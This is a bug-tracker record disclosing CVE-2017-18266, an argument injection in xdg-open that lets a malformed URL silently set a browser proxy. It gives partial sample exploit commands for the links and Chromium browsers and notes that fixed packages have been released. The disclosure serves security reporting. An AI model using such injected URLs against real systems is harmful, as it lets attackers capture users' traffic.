CVE-2017-18266: argument injection in xdg-open
Bug #1772295 reported by
Nicholas Guriev
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Xdg-utils |
Fix Released
|
High
|
|||
xdg-utils (Ubuntu) |
Fix Released
|
Undecided
|
Nicholas Guriev |
Bug Description
An attacker can silently set their proxy in browser settings to capture user's traffic, using a malformed URL in xdg-open.
The following command tries to open Yandex main page though third-party proxy server.
env -i BROWSER="links %s" xdg-open 'http://
Another sample of an exploit with Chromium browser.
env -i BROWSER="chromium %s" xdg-open "http://
CVE References
Changed in xdg-utils (Ubuntu): | |
assignee: | nobody → Nicholas Guriev (mymedia) |
information type: | Private Security → Public Security |
Changed in xdg-utils: | |
importance: | Unknown → High |
status: | Unknown → Fix Released |
To post a comment you must log in.
This was addressed in https:/ /usn.ubuntu. com/usn/ usn-3650- 1 and in xdg-utils 1.1.2-1ubuntu3 for cosmic. Thanks for the report!